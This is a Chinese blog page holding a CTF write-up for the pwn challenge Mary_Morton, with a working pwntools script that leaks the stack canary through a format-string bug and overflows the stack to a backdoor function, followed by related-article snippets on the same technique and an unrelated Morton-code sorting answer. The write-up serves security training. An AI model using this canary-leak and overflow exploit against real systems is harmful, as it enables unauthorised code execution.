mary_morton

最新推荐文章于 2023-05-15 16:06:03 发布
原创 最新推荐文章于 2023-05-15 16:06:03 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

mary_morton

这道题开启了canary保护,大概说一下题目,就是让你选择漏洞一个格式化字符漏洞还有一个就是栈溢出,这道题思路就是通过格式化字符漏洞泄露出cannary的值,然后进行栈溢出,后门题目已经给了。
在这里插入图片描述
来算算偏移量吧,buf为rbp-90h,canary就是v2为rbp-8h,所以偏移量为88h,然后在算一算格式化字符与Buf的偏移量就可以算出要多少字节来进行泄露了。调了一下,输了个aaaaaaaaaaaa.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x,然后得到aaaaaaaaaaaa.74451f60.0000007f.c4a83081.00000000.00000000.61616161.61616161.30252e78,显然得到偏移为6个字节,然后就可以写代码了。

from pwn import *

p=remote('111.198.29.45',59592)
system=0x4008De
p.recvuntil('3. Exit the battle')
p.sendline('2')
p.sendline('%23$p')
canary=int (p.recvuntil('1.')[:-2],16)
print(canary)
p.recvuntil('3. Exit the battle')
p.sendline('1')
payload=0x88*'a'+p64(canary)+p64(0xdeadbeef)+p64(system)
p.sendline(payload)

p.interactive()
gone too soon
关注
攻防世界——进阶PWN:Mary_Morton
baidu_36110484的博客
06-14 491
0x01源码分析 今天做了一道PWN题,考察了格式化字符串漏洞和绕过canary的栈溢出。比较基础,但是还是有值得记录的地方。 checksec查看,64位程序,开启了canary和栈不可执行。拖进IDA里,看到源码逻辑还是比较简单的。存在一个格式化字符串漏洞还有一个栈溢出。还有一个后门函数0x4008DA。 0x02 格式化字符串漏洞 先用老脚本看一下格式化串的相对偏移。 #search_offset.py #encoding:utf-8 from pwn import * context.log_le
攻防世界pwn-Mary_Morton
qq_41168609的博客
01-04 373
题目 1、文件分析 64位的程序,并且开启了NX和Canary,还有Partial RELRO,got表有写权限 执行文件看流程 使用IDA进行分析,发现存在两处漏洞,字符串漏洞和栈溢出漏洞 通过搜索,存在后门函数 2、解题思路: 首先利用字符串漏洞,获取canary的值,绕过Canary保护 利用栈溢出漏洞,执行后门函数,获取到flag 3、获取canary值 计算偏移地址 canary的值就是var_8,我们需要获取var_8的值,栈溢出时保证该值不改变就可以绕过canary保护。 (1
攻防世界 Mary_Morton
10-07 379
1.题目 2.IDA分析 3.流程分析
Mary_Morton(xctf)
weixin_43868725的博客
06-12 447
程序保护和流程 保护: 流程: main() 如果输入1会进入 这个函数有一个栈溢出漏洞。 如果输入2会进入 这个函数有一个格式化字符串漏洞。 还有一个cat_flag的函数 0x1 利用过程 首先这个程序开启了canary,所以直接栈溢出会报错。但是我们知道v2变量中存放的是canary值(v2在函数开始时就被**__readfsqword(0x28u)赋值,函数结束前与__readfsqword(0x28u)**进行比较),如果我们能通过格式化字符串漏洞将v2的值泄露出来就可以利用栈溢出漏洞
攻防世界pwn--Mary_Morton
YANG12345_6的博客
11-16 2356
攻防世界pwn–Mary_Morton file 一下,查看文件属性 checksec一下,查看保护措施 开了canary,在调用函数的时候会在栈上设置一个标志,标志的位置: EIP EBP canary logol ··· 栈的其他内容 开了NX,栈不可执行。 运行一下 ida查看其反汇编代码 在ida里看到有system函数: 地址:0x4008DA gdb调试,查看格式化字符串参数的位置 第六个位置 查看有关栈溢出的函数: 可以利用的栈溢出的buf的位置:rbp
ASIS-CTF-Finals-2017 pwn Mary_Morton Writeup
qq_39596232的博客
09-03 744
题目描述: ASIS-CTF-Finals-2017 非常简单的热身pwn 分析思路: 1、首先查看文件的安全信息: tucker@ubuntu:~/xman/pwn$ file Mary_Morton Mary_Morton: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interp...
PWN做题笔记11-Mary_Morton(格式化字符串暴露canary)
qq_40923256的博客
05-15 580
Mary_Morton,知识点是格式化字符串漏洞暴露canary
攻防世界Mary_Morton
像初雪一样自由洒落
02-16 1002
64位程序,开启了canary和nx保护 执行以下,效果如下: 有提示: 输入1那块存在栈溢出 输入2那块存在格式化字符串漏洞 拖到ida看一下 main函数: 栈溢出的函数: 有canary保护,根据程序可以看出,v2应该就是canary的值,一开始,将_readfsqword(0x28u)的值给v2,后来又和v2做异或操作,只有v2与它还相等,...
XCTF攻防世界高手mary_morton
weixin_45948183的博客
03-24 400
格式化字符串泄露canary,栈溢出 从函数执行就可以看出,一个格式化字符串啊漏洞,一个栈溢出漏洞 checksec了一下有canary的保护,开启了canary,就不能直接利用栈溢出覆盖返回地址,通过通过格式化字符串漏洞泄露canary的值,然后再进行栈溢出的覆盖 buf在rbp-90h,v2在rbp-8h,canary与我们输入参数的偏移为0x90 - 8 = 0x88所以,覆盖返回地址的话...
攻防世界 Pwn Mary_Morton
MrTreebook的博客
12-05 1068
攻防世界 Pwn Mary_Morton1.题目下载地址2.checksec看一下保护3.IDA分析3.1.main函数3.2. sub_400960()3.3. sub_4008EB()3.4.4.gdb动态调试4.1.计算溢出量5.exp 1.题目下载地址 点击下载题目 2.checksec看一下保护 开启了canary,没开PIE 大概率有后门函数,应该不是很难的题 3.IDA分析 3.1.main函数 puts("Welcome to the battle ! "); puts("[Great
xctf高手进阶第二题 Mary_Morton
neuisf的博客
01-23 469
启动运行时输出提示有三个选项,分别是:1.缓冲区溢出漏洞;2.格式化字符串漏洞;3.退出。 解题方法:因为缓冲区溢出在main函数中,利用格式化字符串漏洞读取main函数的canary,利用缓冲区溢出运行0x4008DA处的system (/bin/cat flag)指令。 exp: from pwn import * p=remote('111.198.29.45'...
攻防世界-Mary_Morton
Henlenl的博客
11-30 3135
检查文件信息 amd64-elf文件 开启了Canary保护 开启了NX保护 ida静态分析 进入到sub_4008EB函数 格式化字符串漏洞 另外进入到sub_400960()函数有栈溢出漏洞 但是有一点开启了Canary 那么我们可以通过 格式化字符串任意读 泄露Canary地址 然后利用这个地址来进行溢出漏洞的利用 栈分布如图 而我们知道 v2就是用来储存canary的值的变量 而buf 大小位0x90 v2的大小位 0x8 覆盖return addr,需要0x90-0x8=0x88大小去
Mary_Morton
weixin_46711318的博客
08-19 254
之前有讲到canary的原理,这道题就用到了。 checksec ida 可以看到scanf是我们可以利用的格式化字符串漏洞,因此我们可以确认偏移了6个字节 而v2其实就是canary,通过观察buf所在的栈,发现偏移了0x88,那么就可以开始写代码了。 代码 from pwn import* s=remote('220.249.52.133',48752) sys=0x4008de s.recvuntil('battle') s.sendline('2') s.sendline('%23$p')
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 282
做题记录
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲区溢出漏洞)
Onlyone_1314的博客
09-09 1846
目录标题一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
XCTF Mary_Morton
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-09 551
原题出现在ASIS-CTF-Finals-2017 程序存在两个漏洞,一个格式化字符串漏洞,一个栈溢出漏洞 通过格式化字符串漏洞泄露canary的值,然后再构造payload,利用栈溢出漏洞获取flag canary的值是v2,因此得到canary在栈中的位置为第17位(0x88 / 8=17),又因为程序为64位程序,64位程序函数调用前6个参数通过寄存器传递,所以要加6,因此格式化字符为%2...
2019.10.10攻防世界 Mary_Morton
DSR446的博客
10-10 402
根据索引rbp提供的信息,我们知道,canary位置距离rbp为0x8,而我们的输入参数距离rbp为0x90。且这是一个64位程序。我们可以计算canary的偏移 = 6(6个寄存器)+(0x90-0x8)/8 = 23 :这里子所以减0x8是减的rbp。 【注】:这个程序缺少符号表且没有开PIE,所以我们在下断点的到时候通过在ida中找相应的地址,不用加上程序的加载地址。 最后的 ...
攻防世界高手进阶区 ——Mary_Morton
weixin_62675330的博客
02-26 4207
攻防世界高手进阶区 ——Mary_Morton 不容易呀,这都已经是第七题了,继续加油! 一,老规矩,先分析一下文件 checksec一下 发现开启了栈溢出,可能这个题就是学习栈溢出漏洞绕过的。 运行一下 告诉了存在栈溢出漏洞和格式化字符串漏洞。 file文件 ┌──(root💀kali)-[/home/…/面/ctf_workstation/Offensive_and_defensive_world/Mary_Morton] └─# file Mary_Morton
ASIS-CTF-Finals-2017 Mary_Morton
qq_41071646的博客
01-11 1407
讲道理 这个 其实 感觉有两个方法  两种方法 都要调用一下    第一个  printf函数      第一个是 我们第一个可以    用printf  然后hook掉got的printf  不知道好不好实现  自己搜索了 资料 也没有发现  第二个 就是观察栈了  。。。。。。。 这里有个保护   就是  readfsqword  在 ida 的f5看的不是很清楚 我们 看 汇编窗...
已知 [0] pos=[0.0, 0.0, 0.0], morton_code=000000 [1] pos=[2.0, 0.0, 0.0], morton_code=100000 [2] pos=[0.0, 2.0, 0.0], morton_code=010000 [3] pos=[0.0, 0.0, 2.0], morton_code=001000 [4] pos=[2.0, 2.0, 2.0], morton_code=111000 请你逐步讲解如何根据morton进行基数排序
最新发布
11-06
基数排序是一种非比较型整数排序算法,其原理是将整数按位数切割成不同的数字,然后按每个位数分别比较。下面是根据Morton码对给定的位置信息进行基数排序的详细步骤: ### 步骤分析 1. **确定最大位数**:首先需要确定所有Morton码的最大位数。在这个例子中,所有Morton码都是6位,所以最大位数为6。 2. **从最低位开始排序**:从Morton码的最低位(最右边)开始,对所有位置信息按照该位的值进行排序。可以使用计数排序来实现这一步骤。 3. **依次处理更高位**:重复步骤2,直到处理完所有位数。 ### 代码实现 ```python def radix_sort(positions): # 提取Mortonmorton_codes = [int(code, 2) for _, code in positions] # 确定最大位数 max_digits = len(bin(max(morton_codes))[2:]) # 从最低位开始排序 for i in range(max_digits): # 初始化计数数组 count = [0] * 2 # 统计每个位值的出现次数 for code in morton_codes: bit = (code >> i) & 1 count[bit] += 1 # 计算累积计数 count[1] += count[0] # 初始化排序后的数组 sorted_morton_codes = [0] * len(morton_codes) sorted_positions = [None] * len(positions) # 填充排序后的数组 for j in range(len(morton_codes) - 1, -1, -1): bit = (morton_codes[j] >> i) & 1 index = count[bit] - 1 sorted_morton_codes[index] = morton_codes[j] sorted_positions[index] = positions[j] count[bit] -= 1 # 更新Morton码和位置信息 morton_codes = sorted_morton_codes positions = sorted_positions return positions # 给定的位置信息 positions = [ ([0.0, 0.0, 0.0], '000000'), ([2.0, 0.0, 0.0], '100000'), ([0.0, 2.0, 0.0], '010000'), ([0.0, 0.0, 2.0], '001000'), ([2.0, 2.0, 2.0], '111000') ] # 进行基数排序 sorted_positions = radix_sort(positions) print(sorted_positions) ``` ### 复杂度分析 - **时间复杂度**:$O(d * n)$,其中 $d$ 是Morton码的最大位数,$n$ 是位置信息的数量。 - **空间复杂度**:$O(n)$,主要用于存储排序后的数组。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值